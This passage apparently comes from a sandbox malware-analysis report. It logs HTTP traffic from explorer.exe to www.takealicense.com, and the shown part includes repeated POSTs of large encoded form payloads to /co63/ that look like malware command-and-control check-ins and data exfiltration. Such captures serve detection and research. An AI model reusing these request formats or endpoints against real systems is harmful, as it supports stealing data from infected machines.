y(uMsrct2uMG1~M4H(EpbV4TeUlLn47(0QHtVSeaupLTwo4cgKJw2LVAN7J6v0CmbjX(IXleUMmuAQXwpGnOf(t1C0-JrBXNIWj(GlwUVD9A3tr2ag4lABOsVMF4OFzC9ZU92EqRGRWPct
                                                      Jul 20, 2023 11:45:56.871242046 CEST666OUTData Raw: 35 4d 7a 51 61 68 7a 48 4a 52 43 5a 63 49 66 54 34 37 55 68 44 61 2d 73 34 4a 72 50 5a 49 42 37 48 6a 42 75 73 42 6a 61 66 74 65 7e 67 77 6d 35 32 71 71 50 4b 62 44 53 78 46 78 36 68 6b 55 42 59 6f 4c 38 71 32 2d 4e 7a 36 35 74 71 28 4d 72 55 77
                                                      Data Ascii: 5MzQahzHJRCZcIfT47UhDa-s4JrPZIB7HjBusBjafte~gwm52qqPKbDSxFx6hkUBYoL8q2-Nz65tq(MrUwgYwD6EuFimfL9BN0_9xadM9hgDfnZGRzH75HWIcMcR8czraZOPJdRFsOAcI2ILO1AVamN16GcGRiFuhXx1PtqOsl9RP05K7vagYHNSRX2DxI-XQJkFGoBJvhhD67NCa2TMe~DqD2ZOmdHIvYOAZc4yT9y8eg-5FHe
                                                      Jul 20, 2023 11:45:56.871287107 CEST674OUTData Raw: 79 70 37 65 6e 69 49 63 43 4d 51 68 6f 67 6e 79 6c 62 36 35 67 70 32 71 4e 30 37 79 66 4b 5f 5a 69 33 6e 7e 54 36 5a 69 78 4e 51 38 4e 62 53 28 64 46 34 59 30 65 67 59 4d 55 39 67 55 52 63 6e 78 50 75 31 6f 74 56 44 31 7a 4b 30 66 4c 55 4b 45 28
                                                      Data Ascii: yp7eniIcCMQhognylb65gp2qN07yfK_Zi3n~T6ZixNQ8NbS(dF4Y0egYMU9gURcnxPu1otVD1zK0fLUKE(3rjHLcNLaa0i38U3MQ_pqLXeoqz0dSbbqmkHWodZ9cJqxYqkiog5w8ud4wXtwErQ4FX6i~ZRcyo7RKLfJBvs7SVTybyFYPivq(aSynSus2-NOrr1sEuYEw3hjgUkQHmCzXxp7S-tUgptJQfaF(lGqPWZ7e5WvEYPg
                                                      Jul 20, 2023 11:45:56.871315956 CEST681OUTData Raw: 63 4d 4e 6f 74 6a 7a 52 38 61 65 54 4e 78 53 51 70 44 41 4b 72 6e 45 70 46 45 56 69 68 55 49 63 4a 79 64 51 4d 42 6c 53 42 68 36 58 6f 69 49 4c 42 39 7a 71 4c 39 4b 42 78 4d 2d 43 70 53 73 68 45 62 38 39 79 6a 4e 48 33 56 6d 57 54 43 79 4d 30 54
                                                      Data Ascii: cMNotjzR8aeTNxSQpDAKrnEpFEVihUIcJydQMBlSBh6XoiILB9zqL9KBxM-CpSshEb89yjNH3VmWTCyM0TlQQZ4T2Jzm1x-UtDcauvW(5b3C3WWs_C7WRFkn7~ZVz0zA7b7mDUkEX6Px90G1dnDzodfmkrLKQ80bgOXJsrdKGF1FEd83uYPGE32b0Fg5YUTAVmwmtXWkB1BZVMPcpY76H5JV00Eva~l1d7MlRB-xp1VFqZy08XT
                                                      Jul 20, 2023 11:45:56.871335983 CEST686OUTData Raw: 41 4a 51 66 74 45 71 47 56 6b 58 55 57 74 51 7a 59 57 70 75 41 46 53 37 76 31 53 72 74 57 57 75 62 7a 48 46 66 4d 4d 50 75 78 4c 73 77 64 39 56 52 39 47 48 57 69 42 7e 72 75 75 6f 47 30 38 6a 57 52 52 43 45 6d 6b 39 63 4d 74 72 41 41 73 75 6f 43
                                                      Data Ascii: AJQftEqGVkXUWtQzYWpuAFS7v1SrtWWubzHFfMMPuxLswd9VR9GHWiB~ruuoG08jWRRCEmk9cMtrAAsuoCUrZDyfihvLCnsEvfrn7KaSDoBQRdLVTrWgumHSp3rWHvYSpnJztLJcFxkgtbpQxVqzaWWy-OV147n5HeIZfnXbOCpS46T8rRs2gECjIXMmY61aWi4hQr5vnkCjGiB2_JcY28N2YQh3Iw8HHBhqTmZHiKUnqsLHbYW
                                                      Jul 20, 2023 11:45:56.872181892 CEST687INHTTP/1.1 403 Forbidden
                                                      Server: awselb/2.0
                                                      Date: Thu, 20 Jul 2023 09:45:56 GMT
                                                      Content-Type: text/html; charset=utf-8
                                                      Content-Length: 138
                                                      Connection: close
                                                      Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                                      Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                      15192.168.2.54972634.149.87.4580C:\Windows\explorer.exe
                                                      TimestampkBytes transferredDirectionData
                                                      Jul 20, 2023 11:46:15.190228939 CEST689OUTGET /co63/?aJElwV=C9mZAu2amj0/7xzN/ZGYFZ9Os9Pxtlf2WxsFucW+74+VhIoIvzmW589U18pQtRovant4&lz=9rXXjDMXIb6HXH- HTTP/1.1
                                                      Host: www.takealicense.com
                                                      Connection: close
                                                      Data Raw: 00 00 00 00 00 00 00
                                                      Data Ascii:
                                                      Jul 20, 2023 11:46:15.334331036 CEST690INHTTP/1.1 301 Moved Permanently
                                                      Content-Length: 0
                                                      Location: https://www.takealicense.com/co63?aJElwV=C9mZAu2amj0%2F7xzN%2FZGYFZ9Os9Pxtlf2WxsFucW+74+VhIoIvzmW589U18pQtRovant4&lz=9rXXjDMXIb6HXH-
                                                      Strict-Transport-Security: max-age=3600
                                                      X-Wix-Request-Id: 1689846375.2233686788819076
                                                      Age: 0
                                                      Cache-Control: no-cache
                                                      X-Content-Type-Options: nosniff
                                                      Server: Pepyaka/1.19.10
                                                      Accept-Ranges: bytes
                                                      Date: Thu, 20 Jul 2023 09:46:15 GMT
                                                      X-Served-By: cache-mxp6953-MXP
                                                      X-Cache: MISS
                                                      Server-Timing: cache;desc=miss, varnish;desc=miss_miss, dc;desc=fastly_g
                                                      X-Seen-By: yvSunuo/8ld62ehjr5B7kA==,GXNXSWFXisshliUcwO20NQ1aV/eYQaI5OrqNssi0Z4KvxIl911PKpWsWOzhPjUu/,qquldgcFrj2n046g4RNSVCA9lUGGSSQQI3tXitet/XU=,2d58ifebGbosy5xc+FRaludK2hR3yyHRGDqmxp12QQGKRfFxBID23ME7gOg8AhstxmHv8JmZfQswK4rISLAEpJCJmM3SSAV5HC2c0/ptei4=,2UNV7KOq4oGjA5+PKsX47BDjqNAtrQVFnWu10nx+t+5Wd3xniMsr1HjrszKGvMzr,mNw+yUiq+NSO91VuAKqIn9zgM16/Po/iDX/JwI41ttI=,gSyhVvYt+ZPrXQZcQ10/tZmiz1SOiqsTU3GJmm8Uddc=,pZ8pmqn5qCKnXNQy8ErmK8D5fqmuDbtVbdaoXaNsFfMwnSjqhzzjcR4wo3vcZUw3nCdhy80+Ru8fd2AXHio5HQ==
                                                      Via: 1.1 google
                                                      Connection: close


                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                      16192.168.2.54972734.149.87.4580C:\Windows\explorer.exe
                                                      TimestampkBytes transferredDirectionData
                                                      Jul 20, 2023 11:46:17.363862038 CEST692OUTPOST /co63/ HTTP/1.1
                                                      Host: www.takealicense.com
                                                      Connection: close
                                                      Content-Length: 1484
                                                      Cache-Control: no-cache
                                                      Origin: http://www.takealicense.com
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Accept: */*
                                                      Referer: http://www.takealicense.com/co63/
                                                      Accept-Language: en-US
                                                      Accept-Encoding: gzip, deflate
                                                      Data Raw: 61 4a 45 6c 77 56 3d 4b 66 71 6a 65 49 61 54 72 78 73 72 68 44 4f 75 76 2d 32 4f 61 70 5a 7a 67 6f 33 36 71 48 6a 66 4d 57 63 42 77 5f 36 69 71 4b 4c 56 6f 61 38 6e 69 78 28 47 28 70 51 47 6a 38 49 76 75 41 59 62 59 51 64 45 78 54 52 66 55 4b 39 55 62 33 44 64 71 67 63 4e 39 38 62 70 79 6f 30 62 35 59 4c 38 72 31 34 59 33 78 45 43 79 6c 54 62 47 75 28 37 6b 58 78 34 59 4c 76 4c 64 4e 45 38 6c 47 61 30 4b 47 6a 50 79 32 78 6b 46 4c 79 4a 5a 48 4b 4c 6b 6f 77 70 33 31 77 6d 4c 71 6c 6a 62 70 45 76 49 53 6c 43 62 69 71 76 73 30 6a 4a 50 52 37 59 69 32 52 5f 46 55 76 72 6f 49 61 5a 56 49 59 47 39 49 37 71 47 7a 74 30 33 6c 79 4f 41 71 36 73 55 6f 35 75 56 65 57 55 30 74 42 57 6d 43 31 6b 6d 4e 4a 41 52 4c 58 68 75 47 64 63 4e 37 6e 4f 48 53 7a 43 66 32 7e 59 56 54 37 47 5a 34 7e 68 6b 2d 4d 69 70 65 56 4c 67 33 7e 67 37 6c 6c 68 7e 61 46 75 44 6b 64 46 66 4e 48 53 42 43 33 63 42 59 68 74 4c 64 46 79 76 33 4a 59 6f 56 43 67 31 46 78 57 6b 70 32 4c 51 65 4c 64 61 72 62 73 79 5f 48 38 64 62 51 6d 64 44 57 77 72 59 7a 4b 49 71 4a 6d 58 4b 79 46 72 65 79 36 62 43 42 73 76 38 74 48 37 66 43 65 6c 39 28 30 35 54 57 34 58 45 46 47 58 63 58 71 4b 54 71 71 33 66 31 49 6c 69 6b 48 45 38 79 61 35 54 64 4c 35 44 6a 4d 47 33 30 38 61 53 71 73 72 46 63 53 51 63 46 73 71 56 38 45 64 37 30 49 78 56 75 30 41 37 45 45 75 6b 70 34 30 53 77 46 4c 32 54 4e 66 59 6c 34 39 65 38 63 71 41 47 46 36 6c 59 71 79 78 62 72 50 2d 46 39 62 4f 46 4e 77 67 78 38 4e 67 33 57 47 35 34 49 42 32 66 47 73 49 50 33 65 67 6b 76 28 74 4d 39 78 49 72 69 4e 44 5a 62 30 61 71 65 43 50 4c 77 4a 6d 48 77 48 30 48 5f 52 66 74 30 6c 6a 64 54 4b 46 59 57 32 55 50 2d 65 58 70 4e 64 7a 68 4b 39 35 67 46 45 64 52 66 7a 64 53 51 58 38 69 36 79 4a 6d 30 4f 78 46 47 4a 41 75 55 74 6a 54 36 49 4e 63 6e 61 42 56 69 77 64 6d 31 32 6b 76 42 7a 68 63 32 6a 77 7a 70 70 50 6e 49 31 51 67 76 79 75 53 34 55 6a 7a 59 65 44 64 54 44 50 6e 36 78 38 64 56 35 52 30 67 78 30 44 32 79 4a 54 64 73 6f 38 75 6c 4a 35 62 6c 4c 4e 4f 73 32 77 63 63 77 38 6f 72 68 78 63 4d 36 51 49 35 71 6e 74 46 4a 54 52 43 47 36 4f 66 65 35 73 50 68 65 73 50 5f 30 55 70 4c 73 79 71 52 79 68 48 51 63 63 73 69 75 6e 70 77 28 7a 76 39 4c 43 47 53 6a 4a 52 64 33 31 28 47 43 39 31 6b 4d 6f 49 6d 46 51 4a 53 52 76 4c 65 28 32 74 48 56 35 49 57 75 4e 63 46 51 54 4e 35 55 4e 52 33 44 70 79 50 73 53 6f 63 62 49 57 6f 66 66 61 5a 36 32 7e 61 31 7a 50 56 42 5a 47 69 52 35 35 45 74 52 62 5a 54 49 6d 48 36 63 44 32 43 71 62 4f 54 66 44 56 79 4a 45 66 69 6a 52 38 38 35 4f 4b 61 37 33 4c 4d 43 36 42 36 34 42 35 67 37 41 79 32 41 4d 74 30 59 6e 4c 66 50 43 42 66 37 56 63 38 7a 36 72 6e 34 36 68 5a 31 57 69 48 6e 31 66 69 6e 55 5f 76 64 7a 62 51 5a 42 62 69 38 70 52 54 75 53 57 71 67 75 37 74 64 38 54 4f 4e 74 52 52 36 57 34 44 6f 52 33 62 70 67 44 6e 48 59 36 39 37 70 67 28 5a 33 4a 4b 71 6b 65 28 41 4a 72 32 67 75 61 77 57 32 58 51 51 4a 56 30 71 38 44 6f 37 74 41 6e 6c 7a 70 43 6a 30 47 5a 46 52 35 52 37 76 49 76 54 39 4d 78 49 4b 69 65 74 79 4d 73 4f 4f 41 35 74 46 67 74 67 77 31 77 64 52 5a 68 6b 33 32 51 50 4d 6d 64 51 54 42 38 48 4b 4d 62 78 34 43 38 47 4e 77 6f 46 66 75 49 49 53 76 6c 59 4f 75 36 50 6b 58 36 51 7a 62 56 57 38 30 35 30 35 49 70 6c 4f 34 75 78 31 59 77 45 70 50 79 2d 63 68 45 53 4a 43 51 6f 48 63 62 62 56 6c 48 37 35 39 47 6e 37 62 61 4e 4d 59 4a 43 70 79 76 44 4d 31 6f 64 4e 41 36 4a 71 49 62 56 73 6e 41 6e 32 69 7a 52 7e 71 4b 7a 41 47 4b 38 34 38 4e 50 71 74 49 5f 52 43 64 38 39 4d 43 63 43 6a 63 42 70 39 59 4e 4f 70 5a 48 41 37 4b 5a 66 44 61 46 4e 4b 6d 73 6f 48 56 72 79 4d 56 51 56 63 4c 4f 7e 4b 72 45 52 39 4b 67 52 70 5a 37 45 55 50 4f 55 73 77 47 36 6f 7a 39 4a 66 44 70 75 48 48 67 35 65 34 42 51 66 6e 67 5a 6e 6c 6c 57 66 55 65 79 6f 72 50 4b 58 65 5f 30 45 43 76 55 59 59 31 33 32 74 73 4f 39 68 6a 78 6e 4f 31 4c 74 34 64 48 52 48 73 59 41 78 5a 61 31 37 32 74 4a 54 42 73 52 33 74 4f 4c 57 72 66 38 63 69 6f 4e 42 4f 4b 70 28 56 36 76 56 45 5a 58 78 62 6b 4d 6c 64 46 43 6d 6c 69 77 28 38 64 42 58 52 4b 66 65 5f 47 4a 6f 5a 73 68 28 47 78 45 49 79 68 59 33 42 79 76 62 74 73 39 76 65 63 4d 4e 79
                                                      Data Ascii: aJElwV=KfqjeIaTrxsrhDOuv-2OapZzgo36qHjfMWcBw_6iqKLVoa8nix(G(pQGj8IvuAYbYQdExTRfUK9Ub3DdqgcN98bpyo0b5YL8r14Y3xECylTbGu(7kXx4YLvLdNE8lGa0KGjPy2xkFLyJZHKLkowp31wmLqljbpEvISlCbiqvs0jJPR7Yi2R_FUvroIaZVIYG9I7qGzt03lyOAq6sUo5uVeWU0tBWmC1kmNJARLXhuGdcN7nOHSzCf2~YVT7GZ4~hk-MipeVLg3~g7llh~aFuDkdFfNHSBC3cBYhtLdFyv3JYoVCg1FxWkp2LQeLdarbsy_H8dbQmdDWwrYzKIqJmXKyFrey6bCBsv8tH7fCel9(05TW4XEFGXcXqKTqq3f1IlikHE8ya5TdL5DjMG308aSqsrFcSQcFsqV8Ed70IxVu0A7EEukp40SwFL2TNfYl49e8cqAGF6lYqyxbrP-F9bOFNwgx8Ng3WG54IB2fGsIP3egkv(tM9xIriNDZb0aqeCPLwJmHwH0H_Rft0ljdTKFYW2UP-eXpNdzhK95gFEdRfzdSQX8i6yJm0OxFGJAuUtjT6INcnaBViwdm12kvBzhc2jwzppPnI1QgvyuS4UjzYeDdTDPn6x8dV5R0gx0D2yJTdso8ulJ5blLNOs2wccw8orhxcM6QI5qntFJTRCG6Ofe5sPhesP_0UpLsyqRyhHQccsiunpw(zv9LCGSjJRd31(GC91kMoImFQJSRvLe(2tHV5IWuNcFQTN5UNR3DpyPsSocbIWoffaZ62~a1zPVBZGiR55EtRbZTImH6cD2CqbOTfDVyJEfijR885OKa73LMC6B64B5g7Ay2AMt0YnLfPCBf7Vc8z6rn46hZ1WiHn1finU_vdzbQZBbi8pRTuSWqgu7td8TONtRR6W4DoR3bpgDnHY697pg(Z3JKqke(AJr2guawW2XQQJV0q8Do7tAnlzpCj0GZFR5R7vIvT9MxIKietyMsOOA5tFgtgw1wdRZhk32QPMmdQTB8HKMbx4C8GNwoFfuIISvlYOu6PkX6QzbVW80505IplO4ux1YwEpPy-chESJCQoHcbbVlH759Gn7baNMYJCpyvDM1odNA6JqIbVsnAn2izR~qKzAGK848NPqtI_RCd89MCcCjcBp9YNOpZHA7KZfDaFNKmsoHVryMVQVcLO~KrER9KgRpZ7EUPOUswG6oz9JfDpuHHg5e4BQfngZnllWfUeyorPKXe_0ECvUYY132tsO9hjxnO1Lt4dHRHsYAxZa172tJTBsR3tOLWrf8cioNBOKp(V6vVEZXxbkMldFCmliw(8dBXRKfe_GJoZsh(GxEIyhY3Byvbts9vecMNy400YYIAM1pp0xj0jLodLYwKIbjKKqm3OOq8nk0YrhjdxnIKGiuOf44EGOweWaegGT-FN9XBUy8DtXyrtnADaEppiuZOKMVdfN1~fT8XIRUKOy2(533TCDw).).YrZj
                                                      Jul 20, 2023 11:46:17.435934067 CEST732INHTTP/1.1 403 Forbidden
                                                      Content-Length: 146
                                                      Content-Type: text/html
                                                      X-Wix-Request-Id: 1689846377.39596200702118928
                                                      X-Content-Type-Options: nosniff
                                                      Server: Pepyaka/1.19.10
                                                      Accept-Ranges: bytes
                                                      Date: Thu, 20 Jul 2023 09:46:17 GMT
                                                      X-Served-By: cache-mxp6968-MXP
                                                      X-Cache: MISS
                                                      X-Seen-By: yvSunuo/8ld62ehjr5B7kA==,GXNXSWFXisshliUcwO20NYMupe6WQf6MVMrzEUOojIKTPIdeTaQ6JwDV79BjSUA+,qquldgcFrj2n046g4RNSVLeuNqwcdH46iMA2Je1RdMI=
                                                      Via: 1.1 google
                                                      Connection: close
                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                      17192.168.2.54972834.149.87.4580C:\Windows\explorer.exe
                                                      TimestampkBytes transferredDirectionData
                                                      Jul 20, 2023 11:46:17.390978098 CEST705OUTPOST /co63/ HTTP/1.1
                                                      Host: www.takealicense.com
                                                      Connection: close
                                                      Content-Length: 151296
                                                      Cache-Control: no-cache
                                                      Origin: http://www.takealicense.com
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Accept: */*
                                                      Referer: http://www.takealicense.com/co63/
                                                      Accept-Language: en-US
                                                      Accept-Encoding: gzip, deflate
                                                      Data Raw: 61 4a 45 6c 77 56 3d 4b 66 71 6a 65 4a 54 67 74 42 6f 36 6c 42 71 56 6f 4d 7e 47 65 35 4a 68 6f 50 4f 39 6a 31 44 77 53 52 70 67 77 5f 6d 6d 28 62 36 4d 73 35 6b 6e 71 54 58 46 72 35 51 46 71 63 4a 35 34 41 55 6a 47 7a 64 4d 78 53 6b 34 55 4c 70 58 50 44 6e 55 7e 32 67 61 6c 38 58 56 76 59 67 65 39 64 58 37 72 54 70 48 38 54 6b 43 33 51 48 5a 49 63 57 6e 33 43 42 38 48 5f 50 4a 57 6f 35 79 71 52 6d 38 4d 6c 50 4c 7a 79 70 41 55 62 36 57 58 46 69 7a 6d 4b 67 31 35 6c 30 6c 53 64 45 6f 62 4b 68 55 4c 51 42 73 66 53 79 47 68 51 33 50 5a 7a 44 2d 69 33 55 46 64 46 66 53 77 62 71 69 59 5a 6f 38 32 72 58 71 46 48 67 5f 76 57 4b 4d 64 64 48 70 57 2d 78 39 54 75 6d 78 7a 6f 46 52 6f 79 56 70 6c 4c 56 51 63 4f 75 58 68 6b 74 49 55 35 28 6d 47 79 33 7a 45 47 4f 35 65 44 43 4f 5a 6f 44 31 6e 37 6c 76 6e 62 74 5a 7a 68 53 57 77 55 45 42 35 35 70 32 44 55 73 53 50 64 28 56 65 43 57 31 43 65 64 39 45 64 49 71 74 33 41 5a 69 33 71 79 31 46 39 65 6b 4f 66 77 66 2d 4c 54 58 4a 50 44 79 38 33 38 64 61 68 37 61 69 47 77 72 5f 44 6a 4f 73 56 74 53 4b 7a 43 69 75 6a 73 52 52 6c 5a 76 38 39 54 37 76 61 65 6b 37 58 30 7e 7a 6d 5f 52 45 46 47 4d 4d 58 6f 4b 54 71 69 33 66 30 6b 6c 67 55 54 46 38 36 61 70 69 68 4e 34 31 28 61 58 52 39 50 55 53 71 77 73 45 64 50 55 63 5a 41 71 55 6b 6d 65 62 59 49 77 55 4b 7a 46 61 55 49 35 6d 42 37 36 7a 46 64 46 57 62 64 66 59 35 68 76 4b 77 71 74 68 71 32 37 6c 59 31 39 52 47 78 59 4d 74 58 59 73 64 65 35 48 4e 48 65 67 6a 76 42 5a 73 78 42 55 66 4b 74 4c 72 6a 53 45 31 55 35 66 67 4c 31 36 7a 5f 4a 43 46 44 70 59 75 6c 44 76 33 67 63 54 6a 49 42 32 48 31 52 71 70 59 6b 43 70 48 43 6b 55 70 35 33 4c 73 49 6d 34 56 51 69 5a 72 38 6f 45 52 4b 5f 70 4c 33 39 57 4c 53 36 6a 6c 35 49 76 79 45 6a 70 45 66 79 57 56 73 52 6a 33 41 5a 55 2d 5a 42 59 38 30 64 4b 4b 33 51 4f 6d 34 44 6c 48 37 41 75 66 72 4c 72 71 75 46 63 78 31 4a 7a 4b 54 79 28 35 51 43 46 31 41 66 4c 4a 32 50 6c 57 77 53 41 5a 35 31 62 4b 7e 4e 44 4c 68 76 38 64 7a 4d 56 78 6f 61 30 74 34 32 56 34 52 58 63 77 36 42 73 30 50 34 42 69 36 50 53 5a 43 72 33 77 48 6b 48 30 58 75 74 4f 46 79 4b 63 50 5a 31 42 76 5a 55 4c 67 52 57 6b 59 41 35 6b 71 45 71 6d 71 54 44 38 74 75 6e 58 4a 44 62 69 59 4b 37 45 67 48 79 31 31 7a 6f 46 49 6d 64 4d 4a 42 5a 5f 4b 62 58 32 6e 6b 4e 36 49 78 53 4a 63 31 51 54 59 70 55 6a 63 58 47 35 79 4e 51 53 70 5a 72 49 65 36 7a 64 61 5a 36 6f 35 61 78 54 50 6c 42 75 42 6a 4e 36 35 45 4e 74 62 66 4c 79 6e 48 75 69 49 58 61 72 65 65 54 62 51 77 4f 45 45 61 44 56 52 38 34 71 58 37 72 70 33 37 31 6e 6a 42 36 34 4a 61 4d 72 4c 6a 6e 4b 4c 75 49 63 34 61 28 6c 4a 47 58 6c 52 70 4e 48 78 4b 65 37 6b 47 68 31 63 41 33 6a 72 50 57 33 54 50 33 57 39 63 64 48 4a 5f 75 73 68 67 58 46 64 47 4f 67 6f 71 59 78 6c 67 57 77 6a 42 51 66 5a 4c 6a 4e 58 33 6e 51 6e 41 66 79 59 70 35 77 74 51 28 38 32 6f 75 55 79 73 44 53 42 64 7e 30 6d 50 52 54 32 79 30 54 4b 6d 34 78 7a 43 6b 76 70 46 6d 5f 6d 34 61 70 37 57 64 61 51 39 35 4c 38 4f 76 32 7e 70 64 6a 4e 43 62 48 39 75 63 30 48 58 35 4e 44 56 31 76 38 30 64 5f 53 63 6b 78 73 7a 5a 6a 45 55 64 6c 43 7a 52 78 50 74 28 32 77 51 6c 31 45 6a 49 6d 64 34 46 71 56 5f 63 68 48 4f 65 6e 35 6c 61 30 77 49 35 64 31 6c 39 59 38 2d 5a 4f 4d 6f 32 51 37 76 67 35 75 64 4f 6b 52 32 39 4f 44 6c 63 49 50 71 44 69 57 45 50 76 31 75 44 42 7a 4a 6d 41 66 70 68 6e 6c 6a 37 52 55 47 30 48 4c 33 57 71 6f 61 72 47 68 45 30 35 32 6a 37 6a 7e 4b 43 7a 44 33 36 38 34 62 74 50 6e 39 63 38 45 6d 4a 4a 30 4e 61 6a 45 33 45 64 75 35 41 4a 49 59 6b 54 41 62 66 61 66 67 75 59 54 73 6a 55 68 33 74 45 30 38 31 6e 65 50 6e 56 77 70 36 38 51 74 47 51 51 61 4d 75 43 48 66 5f 4e 2d 5a 43 39 4b 28 51 44 39 58 44 30 58 54 5a 38 64 45 37 4f 59 66 70 46 32 4a 45 63 74 49 5f 77 70 65 6a 48 30 6d 6c 30 32 53 43 5a 61 77 30 30 6d 74 38 4a 4e 4a 6b 6e 56 50 4d 48 5f 6f 72 58 31 36 6e 48 48 64 46 59 6a 28 78 74 4a 4c 34 6c 68 76 7a 44 49 6d 69 42 4e 63 55 75 35 31 74 64 63 7a 68 30 64 39 6b 45 67 6c 72 76 5f 52 73 4f 30 4c 5f 68 52 37 6d 59 41 66 72 48 63 65 69 4e 4b 68 31 75 45 6e 58 74 31 34 67 31 4f 4f 65 33 5a 50 38 78 4f 53 48 66 50 5a 51
                                                      Data Ascii: aJElwV=KfqjeJTgtBo6lBqVoM~Ge5JhoPO9j1DwSRpgw_mm(b6Ms5knqTXFr5QFqcJ54AUjGzdMxSk4ULpXPDnU~2gal8XVvYge9dX7rTpH8TkC3QHZIcWn3CB8H_PJWo5yqRm8MlPLzypAUb6WXFizmKg15l0lSdEobKhULQBsfSyGhQ3PZzD-i3UFdFfSwbqiYZo82rXqFHg_vWKMddHpW-x9TumxzoFRoyVplLVQcOuXhktIU5(mGy3zEGO5eDCOZoD1n7lvnbtZzhSWwUEB55p2DUsSPd(VeCW1Ced9EdIqt3AZi3qy1F9ekOfwf-LTXJPDy838dah7aiGwr_DjOsVtSKzCiujsRRlZv89T7vaek7X0~zm_REFGMMXoKTqi3f0klgUTF86apihN41(aXR9PUSqwsEdPUcZAqUkmebYIwUKzFaUI5mB76zFdFWbdfY5hvKwqthq27lY19RGxYMtXYsde5HNHegjvBZsxBUfKtLrjSE1U5fgL16z_JCFDpYulDv3gcTjIB2H1RqpYkCpHCkUp53LsIm4VQiZr8oERK_pL39WLS6jl5IvyEjpEfyWVsRj3AZU-ZBY80dKK3QOm4DlH7AufrLrquFcx1JzKTy(5QCF1AfLJ2PlWwSAZ51bK~NDLhv8dzMVxoa0t42V4RXcw6Bs0P4Bi6PSZCr3wHkH0XutOFyKcPZ1BvZULgRWkYA5kqEqmqTD8tunXJDbiYK7EgHy11zoFImdMJBZ_KbX2nkN6IxSJc1QTYpUjcXG5yNQSpZrIe6zdaZ6o5axTPlBuBjN65ENtbfLynHuiIXareeTbQwOEEaDVR84qX7rp371njB64JaMrLjnKLuIc4a(lJGXlRpNHxKe7kGh1cA3jrPW3TP3W9cdHJ_ushgXFdGOgoqYxlgWwjBQfZLjNX3nQnAfyYp5wtQ(82ouUysDSBd~0mPRT2y0TKm4xzCkvpFm_m4ap7WdaQ95L8Ov2~pdjNCbH9uc0HX5NDV1v80d_SckxszZjEUdlCzRxPt(2wQl1EjImd4FqV_chHOen5la0wI5d1l9Y8-ZOMo2Q7vg5udOkR29ODlcIPqDiWEPv1uDBzJmAfphnlj7RUG0HL3WqoarGhE052j7j~KCzD3684btPn9c8EmJJ0NajE3Edu5AJIYkTAbfafguYTsjUh3tE081nePnVwp68QtGQQaMuCHf_N-ZC9K(QD9XD0XTZ8dE7OYfpF2JEctI_wpejH0ml02SCZaw00mt8JNJknVPMH_orX16nHHdFYj(xtJL4lhvzDImiBNcUu51tdczh0d9kEglrv_RsO0L_hR7mYAfrHceiNKh1uEnXt14g1OOe3ZP8xOSHfPZQ5xl7BZgfl7BG6CQAIa9LfD7PDS~AhE~pdaMnpndvm3g1x76q9NCIubFFKz2rY_oTROEXzzsr5OjqMHaXlCiEEa16uaPjBhpKLkTSRcLbZFT4yVOh(EyvRbi4ZrvmFiLHUrq1ZZ1r2mcKu_r1qtNigIclcwCKgW6vXvBfBpIxtAS-TvS0Ow~WwS7lmjpH62z9H1OAq6Eyfgdf3uB2d6t3p5zzYwzxfXH8Bj5tBy3yCVsCL09iaTZkiEID54n-kIsuLHdoa90Rmpp0sxfEHirHxuS40rzf~nPzGzVR~GtkQqQNUGVTv9Xyi-~rs2TD4QOwL0uDuHgHWIITDE7TQtJd~wB12izg5R1vvgAzBB3aRbJ2pc~7AWbVlFZVBHuGJGw5L9RatxveWlbQixSgBNxvkDLa29wt5AfPyJ4IaI6lIYA7i-Y2h253WIQOGlFIfSV6deS4OZovirN61eYijx7BG3(Olp03W-VKBzDaiMMMIN~KqHcB4XcfUZig5Bn6KP0Qmp0IEZBa~YsTNOqJJ_9nFVzt~GWoiTIuuO9pOAMhvCClkgvfL2hMUib0M2ttsWJRkfYDtMklitpiHkMDmfvo8vrkfKmI6hYvVHex3QIBv8oEzFmim4bVIEP9NPLiZkvqzzEKQxaqcDugF7SqL-gEV3RXSleneaZkM1QGhrfezI4i0-IdjYM_ee4f50AVtaxhBJwSNmEeYZ9hl2Se4KjOcF48gm7qPfZrz4SbHgM15h3iK8QBLYtkSLMxBKt0C9ujYtWNOrxhDuB5fMtF1CAZIg~g110mcpSsGfEG(UEgFfPZAxaWRMSKpk0fnQuG1EtnaoMIwPGTkvzYix8h(HAnHEcq6Ne8GvxnhCUpLWcJ2NY0STEck5gL86Jym6FQvWsID-xYIxk1mjyExQSM7nb3fWwj9pYGCIIL